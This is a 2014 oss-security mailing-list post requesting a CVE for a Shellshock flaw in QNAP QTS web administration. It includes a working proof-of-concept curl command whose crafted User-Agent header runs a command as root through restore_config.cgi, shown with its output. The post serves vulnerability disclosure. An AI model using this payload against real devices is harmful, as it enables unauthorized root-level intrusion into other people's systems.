Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 29 Sep 2014 09:49:42 +0800
From: Ken Lee <echain.tw@...il.com>
To: cve-assign@...re.org
Cc: oss-security@...ts.openwall.com
Subject: CVE request: QNAP QTS

Hello,

QNAP QTS [1] employ Bash as the default shell and we discover an arbitrary
code execution flaw with UID=0 via `Web administration'.
The PoC is shown as below:

> $ curl -A '() { :;}; echo Content-Type: text/html; echo; echo
> `/usr/bin/id`' http://QNAP_QTS:8080/cgi-bin/restore_config.cgi
> *uid=0(admin) gid=0(administrators)*
> HTTP/1.1 200 OK
>


{ "authPassed": 1, "Result": 0 }


This issue has been acknowledged [2] by QNAP and if not assigned yet,
please help to arrange a CVE identifier for this issue.
Thank you, and have a nice day.


Reference:
[1] http://www.qnap.com.tw/i/en/qts4
[2] http://www.qnap.com/useng/index.php?lang=en-us&sn=885&c=3036&sc=&n=22457

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.